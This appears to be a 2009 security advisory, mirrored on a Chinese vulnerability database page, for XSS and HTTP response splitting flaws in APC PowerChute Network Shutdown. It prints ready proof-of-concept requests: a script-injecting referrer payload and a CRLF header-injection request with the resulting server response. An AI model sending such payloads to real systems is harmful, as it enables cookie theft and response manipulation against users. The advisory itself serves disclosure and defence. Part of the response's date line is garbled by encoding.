APC PowerChute Network Shutdown - HTTP Response Splitting / Cross-Site Scripting

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057494 漏洞类型
发布时间 2009-02-26 更新时间 2009-02-26
漏洞平台 Java CVSS评分 N/A
source: http://www.securityfocus.com/bid/33924/info

APC PowerChute Network Shutdown is prone to an HTTP-response-splitting vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user, steal cookie-based authentication credentials, and influence how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into a false sense of trust. 

1 XSS: GET /security/applet?referrer=>"'><img/src="javascript:alert('DSECRG_XSS')"> 2. Response Splitting Vulnerability found in script contexthelp. vulnerable parameter - "page" Example ******* GET /contexthelp?page=Foobar?%0d%0aDSECRG_HEADER:testvalue HTTP/1.0 response: HTTP/1.0 302 Moved temporarily Content-Length: 0 Date: Ч�~B, 25 �~Aен 2008 10:47:42 GMT Server: Acme.Serve/v1.7 of 13nov96 Connection: close Expires: 0 Cache-Control: no-cache Content-type: text/html Location: help/english/Foobar? DSECRG_HEADER:testvalue Content-type: text/html